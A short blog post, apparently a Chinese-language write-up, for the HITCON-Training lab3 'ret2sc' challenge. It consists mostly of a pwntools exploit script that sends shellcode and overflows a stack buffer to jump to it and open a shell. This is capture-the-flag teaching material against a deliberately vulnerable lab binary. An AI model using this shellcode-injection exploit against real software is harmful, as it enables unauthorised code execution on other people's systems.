HITCON-Training-master lab3 wp

栈溢出,执行shellcode
exp:

from pwn import *
context.log_level="debug"
p = process('./ret2sc')
elf = ELF('./ret2sc')
#stackoverflow  execve the syscall
read_plt = elf.symbols['read']
bss = elf.bss()

log.info("-----------send shellcode----------------")
payload1 = asm(shellcraft.sh())
p.recvuntil("Name:")
p.sendline(payload1)

log.info("-----------return shellcode-----------------")
pause()
payload2 = 'a'*0x1c + 'bbbb' + p32(0x0804a060)
p.recvuntil("Try your best:")
p.send(payload2)

p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Java8张图 11、字符串不变性 12、equals()方法、hashCode()方法的区别 13、...
    Miley_MOJIE阅读 3,789评论 0 11
  • 题目的防护机制: 简单运行了下,程序输出了一句话,然后等待我们输入ida反编译: 程序逻辑很清楚,先判断count...
    zs0zrc阅读 1,028评论 2 1
  • 前方高能预警,本文较长,涉及到的原理性东西较多,建议收藏方便后期查看。 我们常常说堆栈堆栈,但是堆和栈其实是完全不...
    幸运的芳1990阅读 23,019评论 4 43
  • 此时此刻,这段漫长的英国行已经告一段落了。回想当时,我满怀憧憬之心,来到这个陌生而又熟悉的国度。 看夕阳西落,...
    白绾翎阅读 242评论 0 3
  • 花飞梦别离,叶落满清池。 曲笛凄楼阁,栏依独月思。
    辰辰溪阅读 211评论 0 1